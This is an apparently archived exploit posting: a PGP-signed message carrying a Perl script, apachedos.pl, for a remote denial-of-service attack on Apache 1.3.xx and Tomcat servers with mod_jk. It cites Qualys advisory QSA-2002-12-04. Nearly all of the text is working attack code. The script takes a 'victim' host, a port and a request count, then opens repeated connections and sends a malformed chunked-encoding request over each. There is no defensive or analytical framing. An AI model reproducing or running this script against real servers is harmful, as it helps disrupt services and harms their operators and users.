Apache 1.3.xx / Tomcat server with mod_jk remote denial of service exploit which uses chunked encoding requests, as described in Qualys Security Advisory QSA-2002-12-04.
26c922cb94695de52658f3b16ebbeebff4426b27d96a6b5ee0ee308e4f190146
-----BEGIN PGP SIGNED MESSAGE-----
hiya..
as seen in:
Qualys Security Advisory QSA-2002-12-04
dos for apache 1.3.xx/apache tomcat server using mod_jk..
a little DOS script for the above mentioned servers..
written by deadbeat/AnGrY_SQl..
- ------------------begin apachedos.pl----------
#!/usr/bin/perl
use IO::Socket;
print "\nApache Dos for 1.3.XX /Apache Tomcat running mod_jk\n";
print "Written by deadbeat/AnGrY_SQl\n";
print "email: deadbeat@hush.com\n";
$victim = $ARGV[0];
$port = $ARGV[1];
$loop = $ARGV[2];
if (!$ARGV[2]){
die "Usage: perl apachedos.pl <victim> <port> <amount of requests>\n";
}
print "Targetting: $victim\n";
$request = "GET /index.jsp HTTP/1.1\n Host: $victim\nTransfer-Encoding:
Chunked\n\n58323190132blahblahblahblahblah1293193\r\n\r\n";
print $request,"\n";
for ($i = 0; $i < $loop; $i++){
print "Sending request $i\n";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"$port",
PeerAddr=>"$victim"
);
sleep 1;
print $sox $request;
sleep 1;
close $sox;
}
print "\nDone...\n";
- -----EOF------------------
thanks..
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlkEARECABkFAj3vcbgSHGRlYWRiZWF0QGh1c2guY29tAAoJEEUUsIhkeIbpfxsAnjam
PpBlh6Zt4WQ7xUYasSazAda3AJ9RQzJiTBRXtGBnkCiKUSfOVZMNZA==
=H9UM
-----END PGP SIGNATURE-----